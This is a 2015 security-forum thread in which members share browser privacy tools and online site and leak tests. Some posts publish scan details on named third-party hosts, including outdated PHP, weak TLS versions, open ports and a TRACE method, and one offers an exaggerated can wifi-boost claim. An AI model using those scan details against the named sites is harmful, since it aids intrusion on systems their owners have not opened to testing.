Links presented as is. Only to be used when given pertinent written permission to test
or to test on your own website and scripts.

Never go to websites directly, always know your legal position when using scans, if not certain refrain from using,
like with Dazzlepod scan results or Qualys server scan results. The info gained there is not be used against thos scanned.
Qualys Scan Results are not to be given.

You are never to use info gained by cold reconnaissance third party scanning against a particular website/domain. which you do not own. Sometimes you can give a certain scan link (broken), but are not to give the scan result data.

An intersting example of all you can find at this address: http://www.danstools.com/javascript-obfuscate/
Know that in malware loads of so-called pseudo-script and script-obfuscation is used to mislead detection.
so whenever we experiebce obfuscated script it should be a reason to be alert.
As Para-Noid states: "You can only fully trust, what you have tested yourself".

enjoy, my good friends, enjoy,

Damian
Title: Re: Tests and other Media topics
Post by: polonus on July 29, 2015, 06:18:02 PM
A nice chrome extension to prevent type-behavioral profiling, Keyboard privacy, one you should have:
https://chrome.google.com/webstore/detail/keyboard-privacy/aoeboeflhhnobfjkafamelopfeojdohk

pol

P.S. Where you need secure connection and it does not matter, your bank website for instance, disable the extension.
So toggle to `on´ when privacy goes over security, `off´ when security goes over privacy.

Keyboord Privacy seems the extension to save Tor users to be de-anonimyzed by their type profile.
The cat and mouse game between protection and monitoring forces goes on and on...


Damian
Title: Re: Tests and other Media topics
Post by: polonus on July 29, 2015, 06:27:24 PM
Create your own bookmarklets using JQuery: http://benalman.com/code/test/jquery-run-code-bookmarklet
and http://benalman.com/projects/run-jquery-code-bookmarklet/

A fine javascript bookmarklet generator is to be found here: http://mrcoles.com/bookmarklet/

To check a webpage for JQuery, look for it here and drag onto the bookmark bar: http://www.learningjquery.com/2009/04/better-stronger-safer-jquerify-bookmarklet

polonus
Title: Re: Tests and other Media topics
Post by: Para-Noid on July 29, 2015, 08:04:37 PM
Analyzing a Facebook Clickbait Worm

https://blog.sucuri.net/2015/06/analyzing-a-facebook-clickbait-worm.html?utm_campaign=Learn%20how%20to%20avoid%20becoming%20a%20victim%20of%20Facebook%20ClickBait%20Blogpost&utm_medium=social&utm_source=googleplus
Title: Re: Tests and other Media topics
Post by: polonus on July 30, 2015, 12:58:53 PM
For VPN users of Chrome, prevent leaking non-public IP addresses with this extension: https://chrome.google.com/webstore/detail/webrtc-network-limiter/npeicpdbkakmehahjeeohfdhnlpdklia
Another protection against this read-out via javascript methods is the use of NoScript, uMatrix, and Tor-Guard.
To diable it in the Google Chrome browser settings, give in in the address bar: "chrome://flags/" and set "Disable WebRTC device enumeration" to on. In firefox in the address bar give in "about:config" and then set "media.peerconnection.enabled" to "false". Or as said use the versatile overall protection of the NoScript extension in firefox, and uMatrix in Google Chrome.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 30, 2015, 02:14:32 PM
Interesting about what your browser knows about you:
https://isc.sans.edu/forums/diary/Psst+Your+Browser+Knows+All+Your+Secrets/16415/

link article author = sally Vandeven

Curious ->  just open a command prompt and run:

set SSLKEYLOGFILE=c:\sslKeyLogFile.txt

Know that Bitdender products may  ruin "SSL" through installing an all purpose root certificate, so one can no longer see the validation path and it also is not checking for revocation.
This can be disabled by locally deleting the root CA and disabling the SSL scan option, so Bitdefender can no longer interfere,
but for users that want to enforce SSL (like with https: everywhere) this is no option.
Forum users that use Bitdefender, and I know some here that are, should be aware of such facts.

Avast has a far better SSL-scanning feature  ;D as we know from avast team members here.

We know Mozilla NSS has mentioned feature, MS might have it also,
but then  if it was/is the feature never was known to the public.
Info-credits go to Secu_jay.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 30, 2015, 03:14:15 PM
Is Microsoft's Edge browser as safe as the Google CXhrome browser?
Trend Micro says yes, both Edge and Chrome are more secure than firefox is.
Re: http://blog.trendmicro.com/trendlabs-security-intelligence/windows-10s-new-browser-microsoft-edge-improved-but-also-new-risks
Title: Re: Tests and other Media topics
Post by: polonus on July 30, 2015, 06:07:50 PM
Whenever you have privacy concerns try this free solution, Tails, https://tails.boum.org/
Why you should do this: https://tails.boum.org/
Why: http://arstechnica.com/gadgets/2013/10/googles-iron-grip-on-android-controlling-open-source-by-any-means-necessary/

polonus

P.S. Tails is better protected from type profiling yp de-anonimyze tor users with the keyboard privacy plug-in.

D
Title: Re: Tests and other Media topics
Post by: polonus on July 30, 2015, 07:00:09 PM
Yes, and when you live in the EU install CookiesOK when you stumble upon a cookie-wall: https://chrome.google.com/webstore/detail/cookiesok/afmkbjoakcacgljcdccofbffloabfbni
or https://addons.mozilla.org/firefox/addon/cookiesok/
or https://addons.opera.com/en/extensions/details/cookiesok

pol
Title: Re: Tests and other Media topics
Post by: polonus on August 04, 2015, 02:37:36 PM
Coalition annoucing new DNT standards: : https://www.eff.org/press/releases/coalition-announces-new-do-not-track-standard-web-browsing - The new DNT standard is not an ad- or tracker-blocker, but it works in tandem with these technologies.
As it is a voluntary measure your privacy is depending on what certain parties honor and what not. I even suspect ABP to be more commercially inclined (showing "unobtrusive" ads they were paid to let through) then purely being a tracking blocker.

Nowhere I read about new tracking procedures like canvas printing tracking for which I use a special extension.
In my option the new DNT standards do nothing against malvertising and SEO Spam (Google cannot even stop it with a big hidden team of experts trying to stem i in,, it is an endless excercise that does not seem to work somehow).
I rather use uBlock Origin then ABP and I use Anti-Adblock Killer 8.2.

With DuckDuckGo I do not see Avast Online Security info, I do not see Bitdefender TrafficLight info, DrWeb URL cheker info (I can scan that url seperately, but that is not what I want), I only see WOT results. n with DuckDuckGo Extended running from Tampermonkey I haven't the same functionality as on the Google Searchpage or Ixquick or startpage. With these alternatives I miss the so-called "road signs" what destinations to avoid. Allthough I participate on WOT as "luntrus" having only these results shown on a search page is a bit meagre to my liking.

I think the whole thing is purely cosmetic camouflage, why they have no deal on blocking ads from Windows gadgets for instance or using adblockers on Google's Android OS. There personalized ad-targeting has won and we see EEF's full compliance, at least I haven't heard a word of protest as there we cannot even stop tracking nor protect/block when such ads get malvertised. Malvertising campaigns is the main and only reason polonus want to be able to block all ads.
It would be better if they could have made a model where users pay to surf absolutely ad-free.

The best solution so far is using script blockers like NoScript and RequestPolicy in firefox to toggle what you wanna block per se. In Google Chrome I have uMatrix where I canb selectively block cookie, css, picture, plug-in, script, XHR, frame, others- here on this page for avast.com and for the present domain with avast.com, google-analytics com  and www.google-analytics com. I can block 9 cookies, 6 images, 2 scripts from running. In Chrome I also have the StopTracking extension running.

polonus


P.S. What is funny that on a link where the new DNS policy was discussed. e.g. http://webwereld.nl/markttrends/87656-adblock-en-duckduckgo-brengen-echte-do-not-track# I had to block a link to -http://track.adform.net/
and encountered this: http://toolbar.netcraft.com/site_report?url=http://script.leadboxer.com

How could they come to DNT when all of the Internet is just about this one activity, is beyond me. First you totally surrender and then you start to scream no-one respects your privacy anymore.  :(

Damian
Title: Re: Tests and other Media topics
Post by: mchain on August 04, 2015, 07:40:08 PM
Coalition annoucing new DNT standards: : https://www.eff.org/press/releases/coalition-announces-new-do-not-track-standard-web-browsing - The new DNT standard is not an ad- or tracker-blocker, but it works in tandem with these technologies.
As it is a voluntary measure your privacy is depending on what certain parties honor and what not. I even suspect ABP to be more commercially inclined (showing "unobtrusive" ads they were paid to let through) then purely being a tracking blocker.

Nowhere I read about new tracking procedures like canvas printing tracking for which I use a special extension.
In my option the new DNT standards do nothing against malvertising and SEO Spam (Google cannot even stop it with a big hidden team of experts trying to stem i in,, it is an endless excercise that does not seem to work somehow).
I rather use uBlock Origin then ABP and I use Anti-Adblock Killer 8.2.

With DuckDuckGo I do not see Avast Online Security info, I do not see Bitdefender TrafficLight info, DrWeb URL cheker info (I can scan that url seperately, but that is not what I want), I only see WOT results. n with DuckDuckGo Extended running from Tampermonkey I haven't the same functionality as on the Google Searchpage or Ixquick or startpage. With these alternatives I miss the so-called "road signs" what destinations to avoid. Allthough I participate on WOT as "luntrus" having only these results shown on a search page is a bit meagre to my liking.

I think the whole thing is purely cosmetic camouflage, why they have no deal on blocking ads from Windows gadgets for instance or using adblockers on Google's Android OS. There personalized ad-targeting has won and we see EEF's full compliance, at least I haven't heard a word of protest as there we cannot even stop tracking nor protect/block when such ads get malvertised. Malvertising campaigns is the main and only reason polonus want to be able to block all ads.
It would be better if they could have made a model where users pay to surf absolutely ad-free.

The best solution so far is using script blockers like NoScript and RequestPolicy in firefox to toggle what you wanna block per se. In Google Chrome I have uMatrix where I canb selectively block cookie, css, picture, plug-in, script, XHR, frame, others- here on this page for avast.com and for the present domain with avast.com, google-analytics com  and www.google-analytics com. I can block 9 cookies, 6 images, 2 scripts from running. In Chrome I also have the StopTracking extension running.

polonus


P.S. What is funny that on a link where the new DNS policy was discussed. e.g. http://webwereld.nl/markttrends/87656-adblock-en-duckduckgo-brengen-echte-do-not-track# I had to block a link to -http://track.adform.net/
and encountered this: http://toolbar.netcraft.com/site_report?url=http://script.leadboxer.com

How could they come to DNT when all of the Internet is just about this one activity, is beyond me. First you totally surrender and then you start to scream no-one respects your privacy anymore.  :(

Damian
Agree with you there.  Of note is duckduck go webpage, no one seems to support anything there other than WOT for ratings purposes, on all sites displayed there, not even avast online security.  Could be that this website is doing what it says it is doing, not allowing invasive privacy tracking to occur from within it, as it is general knowledge every privacy extension you put on your browser can report to the creator of that extension applet without your explicit user interaction or consent.

But, just moving off that page is no guarantee of continued privacy when going to another site off of it.  DuckDuckgo also actively moderates what their users can see on it as well. 

Notwithstanding that, for my purposes, it works well and is safer to use than Google, imo.  DNT is not what it says it is.
Title: Re: Tests and other Media topics
Post by: Para-Noid on August 04, 2015, 08:12:42 PM
Common Website Security Terminology Defined

https://blog.sucuri.net/2015/07/common-website-security-terminology-defined.html?utm_campaign=Common%20Website%20Security%20Terminology%20Defined%20Blogpost&utm_medium=social&utm_source=googleplus

WP-CLI Guide: Secure WordPress Backup and Update

https://blog.sucuri.net/2015/07/wp-cli-guide-secure-wordpress-backup-update.html?utm_campaign=WP-CLI%20Guide%3A%20Secure%20WordPress%20Backup%20and%20Update&utm_medium=social&utm_source=googleplus
Title: Re: Tests and other Media topics
Post by: polonus on August 05, 2015, 12:11:16 PM
A question to the forum users,
Who uses the wonderful protection of uMatrix extension inside Google Chrome or inside Firefox?

It keeps you in full control of where your browser is allowed to connect for all domains, the present domain, and for all third party domains (some domains are blocked as by default like google.analytics etc. etc.) You can toggle for blocking/unblocking per cookie, css, image, plug-in, script, XHR, frame, others. Red is blocked and green is allowed to connect. You can turn the filtering off per website. You can save all temp. changes for a website or delete such temp. settings. Renew the page from inside uMatrix. Visit the logger.
You can set spoofing for agent (on/off), referer spoofing (on/off)and strict HTTPS (on/off). You can delete all temp. changes to the default settings under + or g to the dashboard. You can change settings for visibility, use block lists, use your own permanent and temp. filters. I think it is so versatile anyone can learn to use it and even as per default it gives loads of protection.

Like to hear your reactions,

polonus
Title: Re: Tests and other Media topics
Post by: Lisandro on August 05, 2015, 01:10:00 PM
A question to the forum users,
Who uses the wonderful protection of uMatrix extension inside Google Chrome or inside Firefox?
I use.
Title: Re: Tests and other Media topics
Post by: Para-Noid on August 05, 2015, 11:29:34 PM
The Business of Security: The Nitty Gritty of Running a Multi-Million Dollar Business

http://www.slideshare.net/SucuriSecurity/the-business-of-security-the-nitty-gritty-of-running-a-multimillion-dollar-business?utm_campaign=The%20Business%20of%20Security%3A%20The%20Nitty%20Gritty%20of%20Running%20a%20Multi-Million%20Dollar%20Business%20Slideshare&utm_medium=social&utm_source=googleplus
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2015, 01:39:32 AM
HTML5 Canvas Fingerprinting test: https://www.browserleaks.com/canvas
On the project: https://github.com/Valve/fingerprintjs
See how it is supported in the browser: http://caniuse.com/#search=canvas
Test: http://www.html5accessibility.com/tests/canvas.html
Protection: http://fingerprint.pet-portal.eu/?menu=6  and now also via Privacy Badger extension.

Quite annother form of Figerprinting: https://www.grc.com/fingerprints.htmDomain Name   Certificate Name   EV   Security Certificate's Authentic Fingerprint   Click to view complete certificate chain
forum.avast.com   *.avast.com   —   DF:57:EC:1C:3A:4D:EE:B2:55:46:5F:26:08:0B:8E:92:74:4A:D8:00

Test the uniqueness of your browser and what it revealse: https://panopticlick.eff.org/index.php?action=log&js=yes
See Content Filtering and Proxy Detection in my browser attached.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2015, 01:38:04 PM
Hi folks,
Quote taken from browserleaks
Quote
Disable WebRTC in Chrome
WebRTC in Google Chorme is supported and enabled by default since Chorme version 23 (and based on it, ex. Opera, Vivaldi).

Bad news:

You CAN'T turn off WebRTC on desktop version of Google Chrome, Disable WebRTC flag is available only on Android.

Good news:

There is a Chrome Extension: WebRTC Block.

Extension hides your public IP when you're behind VPN. It will leak only VPN's public IP, but not your real provider IP address! Extension also hides your Local/NAT IP addresses.

Unfortunately, if you're behind proxy but not VPN, WebRTC Block will not help you.

I can't do anything, and no one can. This piece of the periodic table is ****ed by design. So PLEASE stop insulting me on mail and webstore that it's "NOT WORKING !!!" :)

Just use FF. There is no drama.
This is further proof for me that the Google Chrome browser  is one giant tracking machine by default -
Looking at the extension the developer of it states:
Quote
Disable WebRTC in Your Web Browser!
At the moment, there is no way to completely  Block WebRTC in Google Chrome.

I should say sorry, but I cant just rename the extension.


Google Chrome is putting some individuals at risk here, read: https://productforums.google.com/forum/#!topic/chrome/QN7jleWJawY

But this works, alas not on Android, go to address bar and type chrome://flags/#disable-webrtc

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on August 08, 2015, 04:04:04 PM
Hi folks,

(Snip)

polonus
More information and a discussion on this topic at:
https://code.google.com/p/chromium/issues/detail?id=333752 (https://code.google.com/p/chromium/issues/detail?id=333752)
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2015, 04:11:34 PM
Are you safe via a VPN, test here : https://www.privacytools.io/webrtc.html
I was secure here: https://frankfurt-s02-i01.cg-dialup.net/go/browse.php?u=https://www.privacytools.io/webrtc.html&b=7&f=norefer
Read here why users should use firefox rather than chrome: https://www.privacytools.io/#webrtc

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 09, 2015, 11:42:58 PM
When you detect website malware every day all of the day, like I do, I'd also like to test a domainn for SSL Protocol Support.
We can test here: https://foundeo.com/products/iis-weak-ssl-ciphers/test.cfm?test_domain=m-pathy.com
Nice candidates for weaknesses are to be found here: https://www.eff.org/https-everywhere/atlas/domains/m-pathy.com.html
That is why I haven't set hhtps as per default.
Browser JSGuard is an extension that will alert you when your log-in data go in plain txt over the wire.
For instance what is wrong here: https://www.m-pathy.com/
Well let us start here and that is not encouraging:
HTTP Server: Apache HTTP Server 2.4.10
PHP Version: 5.3.26 (Outdated)

The protocol settings:
Protocol   Status   Recommendation
SSLv2   SSLv2 is Disabled   SSLv2 is weak and should be disabled. More information.
SSLv3   SSLv3 is Disabled   Consider disabling SSLv3 to mitigate the POODLE attack. Should be disabled for PCI DSS 3.1 Compliance
TLSv1   TLSv1 is Enabled   TLSv1 may be enabled for existing implementations, however PCI DSS 3.1 § 2.2.3 states that: SSL and early TLS are not considered strong cryptography and cannot be used as a security control after June 30, 2016. Prior to this date, existing implementations that use SSL and/or early TLS must have a formal Risk Mitigation and Migration Plan in place. Effective immediately, new implementations must not use SSL or early TLS
TLSv1.1   TLSv1.1 is Enabled   TLSv1.1 may be enabled for existing implementations, however PCI DSS 3.1 § 2.2.3 states that: SSL and early TLS are not considered strong cryptography and cannot be used as a security control after June 30, 2016. Prior to this date, existing implementations that use SSL and/or early TLS must have a formal Risk Mitigation and Migration Plan in place. Effective immediately, new implementations must not use SSL or early TLS. Some assert that the term early TLS includes both TLS 1.0 and 1.1, check with your PCI QSA.
TLSv1.2   TLSv1.2 is Enabled   TLS 1
Certicate problem for one IP: https://www.ssllabs.com/ssltest/analyze.html?d=m-pathy.com
E-commerce Safety Information
Transaction Protection
Certified SSL is used to encrypt transactions
SSL Issuer: AlphaSSL CA - SHA256 - G2
SSL Expires: 2018-02-19 01:26:54 UTC
See also: http://toolbar.netcraft.com/site_report?url=https://www.m-pathy.com

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on August 09, 2015, 11:46:53 PM
Most people, unless like you they are looking for malware, hardly ever "run into it" provided the are reasonably protected.
I haven't received a warning about running into a malicious website or an infection in a very, very long time. :)


Title: Re: Tests and other Media topics
Post by: polonus on August 10, 2015, 12:17:26 AM
Hi bob3160,

When you are surfing with Google Chrome you often run into SSL sites that do not have the full green padlock.
You´d never click the yellow triangle showing there is also insecure content on a site that does not go via ssl.  :o
I often still see a lot of sites like this for instance : IEEE Xplore Abstract - Browser JS Guard: Detect... padlock icon
ieeexplore.ieee.org
Alerts (1)
Insecure login (1)
Password will be transmited in clear to http://ieeexplore.ieee.org/servlet/LoginModalController

When the green padlock is missing and I see such red alerts and I investigate and other users should also hesitate and check what they are going to do there and whether their info is safe going to that site or log-in.

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on August 10, 2015, 12:21:23 AM
(http://www.screencast-o-matic.com/screenshots/u/Lh/1439158816683-7563.png)
It isn't green but I still visit the site. As you know, I don't put my system through all the hoops you do.

Title: Re: Tests and other Media topics
Post by: polonus on August 10, 2015, 12:49:48 AM
Hi bob3160,

It is not about going through hoops, I do all this as a volunteer forum member to detect insecurities and report them to Avast so the Avast team may protect all of their users better and I found quite something up over the last few years.

I am far from expecting the average user to do similar things. This thread is meant for people that are in website scanning, website owners, security analysts, hosters, and a couple of other enthusiasts here on the forums.

I do not say you have to go to sites like I do and with the suspicion and the experience I have stashed at the back of your mind, no-way, that is just for website analysts and other forum users here that like the subject.

But I should like it a lot for the average user to become just a little tad more aware and concerned. Do not just trust all you were being told, because all you are being told is not always the truth where website security is concerned. Our forum member, Para-Noid, would say: `It is secure only what you have tested to be secure!´.

Damian
Title: Re: Tests and other Media topics
Post by: polonus on August 10, 2015, 11:02:25 PM
"There is another obscure way of tracking users without using cookies or even Javascript."
Read about this and test here:
"http://lucb1e.com/rp/cookielesscookies/"
This is stopping "this 'phorming": https://www.dephormation.org.uk/index.php?page=81

polonus

P.S. The main reason for this test was to promote self-desrructing cookies like with Crunch etc.

D
Title: Re: Tests and other Media topics
Post by: Para-Noid on August 12, 2015, 07:47:45 PM
Persistent XSS Vulnerability in WordPress Explained

https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html?utm_campaign=Persistent%20XSS%20Vulnerability%20in%20WordPress%20Explained%20Blogpost&utm_medium=social&utm_source=googleplus
Title: Re: Tests and other Media topics
Post by: Para-Noid on August 19, 2015, 04:02:26 PM
Ask Sucuri: How does SiteCheck work?

https://blog.sucuri.net/2012/10/ask-sucuri-how-does-sitecheck-work.html?utm_campaign=Ask%20Sucuri%3A%20How%20does%20SiteCheck%20work%3F%20Blogpost&utm_medium=social&utm_source=googleplus
Title: Re: Tests and other Media topics
Post by: Para-Noid on August 19, 2015, 04:03:19 PM
10 Tips to Improve Your Website Security

https://blog.sucuri.net/2015/06/10-tips-to-improve-your-website-security.html?utm_campaign=10%20Tips%20to%20Improve%20Your%20Website%20Security%20Blogpost&utm_medium=social&utm_source=googleplus
Title: Re: Tests and other Media topics
Post by: polonus on August 19, 2015, 04:09:03 PM
Two fine new test links: http://oscarotero.com/embed/demo/index.php?url=
and
http://iframely.com/debug  also avail;able as extension.
and Low Level Site Explorer: http://1col.ru/www.investigue-me.tumblr.com

enjoy, my good friends, enjoy.
Title: Re: Tests and other Media topics
Post by: polonus on September 18, 2015, 10:01:11 PM
Test for the WbRTC IP Leak VPN/Tor IP Test: http://www.japanweb.info/browse.php/GBWhw2bzXIaDEN9sFiADKd5_2FtKHD9Lg_2F4G2TUJ3BpxHczbg_3D/b29/fnorefer/
Nothing showed up.
http://www.japanweb.info/browse.php/UQChm3nl/X8GAD89z/ByIeOcN1/q6HD_2Fr/h9uA_3D_/3D/b29/
Only the IP of the proxy is shown: 108.59.11.116
But we see this proxy could also be abused: https://www.stopforumspam.com/ipcheck/108.59.11.116
abuse on hosted-by.leaseweb.com in Delaware
commonName=server.bind2.com -  OpenSSH 5.3 (protocol 2.0)
0/tcp  open  http     Apache httpd 2.4.12 ((Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4)
| http-methods: Potentially risky methods: TRACE
ssl/http Apache httpd 2.4.12 ((Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
with a defect in delegation handling
Found mail servers with inconsistent reverse DNS entries -> mailfilter2.ocom.com.   2001:1af8:4100:a064::20
Primary nameserver: dns01001.ams1.lswcdn.com.
Concluding the proxy scan result.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 19, 2015, 01:03:06 PM
I tested this code here:
Code: [Select]
<HTML>
<HEAD>
<TITLE>My First Script</TITLE>
</HEAD>

<BODY>
<H1>Let's Script...</H1>
<HR>
<SCRIPT LANGUAGR="JavaScript">
<!--hide from old browsers
document.write("This browser is version "+chrome.appVersion)
document.write("of <B> + chrome.appName +</B>.")
//end script hiding -->
</SCRIPT>
</BODY>
</HTML>

here: http://caja.appspot.com/  Rendered result Eval Result Time 361 ms = Let's Script...

(source adopted from Javascript Bible)  ;)


polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 19, 2015, 07:28:38 PM
DNS router checker: https://campaigns.f-secure.com/router-checker/
NO ISSUES WERE FOUND
All is well. Have a nice day!

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on September 19, 2015, 10:02:33 PM
DNS router checker: https://campaigns.f-secure.com/router-checker/ (https://campaigns.f-secure.com/router-checker/)
NO ISSUES WERE FOUND
All is well. Have a nice day!

polonus
No issues found here either but I already knew that from my Avast Network Scan. :)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1442692934591-56816.png)
Title: Re: Tests and other Media topics
Post by: polonus on September 22, 2015, 01:58:39 AM
Test for Canvas Fingerprinting here: http://www.browserleaks.com/canvas
Detect it on sites? Re:  https://chrome.google.com/webstore/detail/canvasfingerprintblock/ipmjngkmngdcdpmgmiebdmfbkcecdndc
Who is into this:  CanvasFingerprintBlock
Blocked 2 potential HTML canvas fingerprinting attempts on this page
Prevented a script on https://hackertarget.com from capturing the point (16, 16) on the following 300px × 150px canvas:
Prevented a script on https://hackertarget.com from capturing the following 300px × 150px canvas:
300px × 150px

polonus
Title: Re: Tests and other Media topics
Post by: Simion on September 22, 2015, 04:34:04 AM
Test for Canvas Fingerprinting here: http://www.browserleaks.com/canvas
Detect it on sites? Re:  https://chrome.google.com/webstore/detail/canvasfingerprintblock/ipmjngkmngdcdpmgmiebdmfbkcecdndc
Who is into this:  CanvasFingerprintBlock
Blocked 2 potential HTML canvas fingerprinting attempts on this page
Prevented a script on https://hackertarget.com from capturing the point (16, 16) on the following 300px × 150px canvas:
Prevented a script on https://hackertarget.com from capturing the following 300px × 150px canvas:
300px × 150px

polonus

Greetings Damien:

I have tested this on a linux platform with chromium browser. I have installed the add-on which seems to work properly. But despite reading "How Does It Work" and "Further Reading", I don't understand why being unique and not in their database is a bad thing (red X). Any thoughts?
Title: Re: Tests and other Media topics
Post by: polonus on October 01, 2015, 12:27:57 AM
Examples of SQL and a checker:
http://www.itl.nist.gov/div897/ctg/dm/sql_examples.htm
Mysqli Prepare Statement Checker

This tool is to help debug SQL statements used in mysqli prepare statements. Enter your SQL, flags and variable that you would use in constructing your prepare statement below to see the SQL generated as well as any issues.

SQL:
INSERT INTO STATION VALUES (13, \'Phoenix\', \'AZ\', 33, 112); INSERT INTO STATION VALUES (44, \'Denver\', \'CO\', 40, 105); INSERT INTO STATION VALUES (66, \'Caribou\', \'ME\', 47, 68);
Issues:
More flags than variables. Less placeholders (?) than flags
SQL Query:
INSERT INTO STATION VALUES (13, \'Phoenix\', \'AZ\', 33, 112);
INSERT INTO STATION VALUES (44, \'Denver\', \'CO\', 40, 105);
INSERT INTO STATION VALUES (66, \'Caribou\', \'ME\', 47, 68);

Flags:
isd
 Only use i, s, d or b.   Check tool: http://www.mustbebuilt.co.uk/apps/mysql-prepare-checker/

enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 14, 2015, 07:48:13 PM
Test to see if they’re tracking you, visit request.urih.com. Go to: http://request.urih.com/
40% of the trackers on this site could be protecting you from NSA snooping. Tell urih.com to fix it.

Identifiers | All Trackers
 Insecure Identifiers
Unique IDs about your web browsing habits have been insecurely sent to third parties.
Tracked e.g. by levelity.com (non-secure ID tracking).

To get likewise reports, install Tracker SSL extension in Google Chrome: chrome://extensions/?id=hgoabgkpjcbliklekfgepfdlmcnkjnao 

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 15, 2015, 03:46:18 PM
Coming to a place near you soon copyright on JPEG images?
Next step copyright on sharing txt's? Read: http://www.engadget.com/2015/10/14/jpeg-copy-protection/?ncid=txtlnkusaolp00000589
Whenever you wanna do this, have it visibly inside the picture, add watermark and eventually a CopyRight sign,
so folks know it has DRM protection, else we are in muddy waters sharing copyrighted material we don't even know was
copyrighted in the first place. Nice project for bounty hunters to gain some extra money....  :o
And what about free jpeg that wanna be shared?

Good developent DRM on anything to protect new sacks with old wine and vested interests?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 20, 2015, 02:18:25 PM
Dear Avast Community Friends,

Did you test here: https://en.internet.nl/
My test results could not be excellent because my provider here has not yet migrated to supporting IPv6 next to IPv4.
I have an IPv6 address starting with "fe" (same fc-fd) unable to work with the public IPv6 Internet.
The situation of many globally now. Good thing is they do not expect any issues for me after the launch!
DNSSEC is OK. Also test here: http://test-ipv6.com/ (translate with Google Translate).

polonus
Title: Re: Tests and other Media topics
Post by: Secondmineboy on October 20, 2015, 02:33:33 PM
Got a full 0/10, our routers do not support IPv6 and i bet they still run with the original firmware.

I dont want to know how old they are anyway......
Title: Re: Tests and other Media topics
Post by: midnight on October 20, 2015, 03:22:28 PM
Test shows
Title: Re: Tests and other Media topics
Post by: polonus on October 20, 2015, 03:57:34 PM
Hi -midnight,

The good news has a good side and a darker more sinister side to it. UsingIPv6 has a new quality as it is unique and stays the same and has a new feature that it can be used for location tracking. So more secure from one point of view, but easier for those that want to monitor your whereabouts all the time all of the time. Read about this novel use of IPv6 here: http://ip6.nl/location/

So the situation is getting ever better for the global players to do their thing, but harder for the individual to protect against certain aspects of what they do. ;) Have a nice day.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 29, 2015, 07:26:20 PM
Here you can check your site for missing Google Analytics Tracking Code: http://www.gachecker.com/
The results for Avast Forum site shows that only Google Universal Analytics is being flagged, all others produce an x.
See attached image,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 30, 2015, 01:27:16 PM
Easy Wifi Boost
Follow the next steps to boost your wifi signal considerably:

Drink a can of beer or soda.
Cut off the bottom of the can.
Cut off the top likewise. Note! Do not cut all the way round. Leave three to four centimeters at the top.
Cut the can lengthwise.
Place the can over the modem antenna or router modem. Your wifi signal will either double or be even three times stronger.

Enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on October 30, 2015, 02:01:31 PM
Easy Wifi Boost
Follow the next steps to boost your wifi signal considerably:

Drink a can of beer or soda.
Cut off the bottom of the can.
Cut off the top likewise. Note! Do not cut all the way round. Leave three to four centimeters at the top.
Cut the can lengthwise.
Place the can over the modem antenna or router modem. Your wifi signal will either double or be even three times stronger.

Enjoy,

polonus
If you need more help, you'll find it here:
http://www.wikihow.com/Make-a-Wi-Fi-Booster-Using-Only-a-Can (http://www.wikihow.com/Make-a-Wi-Fi-Booster-Using-Only-a-Can)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1446213726445-30955.png)
Title: Re: Tests and other Media topics
Post by: polonus on October 30, 2015, 02:09:34 PM
Knew you liked this one, bob3160, just knew  ;D

Damian
Title: Re: Tests and other Media topics
Post by: DavidR on October 30, 2015, 03:26:15 PM
Easy Wifi Boost
Follow the next steps to boost your wifi signal considerably:

Drink a can of beer or soda.
Cut off the bottom of the can.
Cut off the top likewise. Note! Do not cut all the way round. Leave three to four centimeters at the top.
Cut the can lengthwise.
Place the can over the modem antenna or router modem. Your wifi signal will either double or be even three times stronger.

Enjoy,

polonus

Use cans of extra XXX strength beer or cider to enhance the effect ;D
Title: Re: Tests and other Media topics
Post by: bob3160 on October 30, 2015, 04:28:38 PM
Easy Wifi Boost
Follow the next steps to boost your wifi signal considerably:

Drink a can of beer or soda.
Cut off the bottom of the can.
Cut off the top likewise. Note! Do not cut all the way round. Leave three to four centimeters at the top.
Cut the can lengthwise.
Place the can over the modem antenna or router modem. Your wifi signal will either double or be even three times stronger.

Enjoy,

polonus

Use cans of extra XXX strength beer or cider to enhance the effect ;D
XXX strength would result in WiFly not WiFi
Title: Re: Tests and other Media topics
Post by: DavidR on October 30, 2015, 05:34:28 PM
Easy Wifi Boost
Follow the next steps to boost your wifi signal considerably:

Drink a can of beer or soda.
Cut off the bottom of the can.
Cut off the top likewise. Note! Do not cut all the way round. Leave three to four centimeters at the top.
Cut the can lengthwise.
Place the can over the modem antenna or router modem. Your wifi signal will either double or be even three times stronger.

Enjoy,

polonus

Use cans of extra XXX strength beer or cider to enhance the effect ;D
XXX strength would result in WiFly not WiFi

Just been reading an article in UK MicroMart magazine about LiFi being the next major development the Li part is about the Light Spectrum being infinitely greater than radio band. Even works underwater better than radio waves. Unfortunately it is still years away.
Title: Re: Tests and other Media topics
Post by: polonus on October 30, 2015, 10:12:30 PM
To make your own Tor Ban List combine IP info from the Tor Node List https://www.dan.me.uk/tornodes (refreshed every 30 minutes) and then seach on ExoneraTor what is out there and whether to block.
So we have found 100.36.126.180   0FAA2997928261797309​05EB8A33905AB52B48B1   anothermiddlefinger   No
For current threat events look here: https://cymon.io/100.36.126.180
Reporting sources: pbl.spamhaus.org, zen.spamhaus.org, dnsbl.ahbl.org, tor.ahbl.org
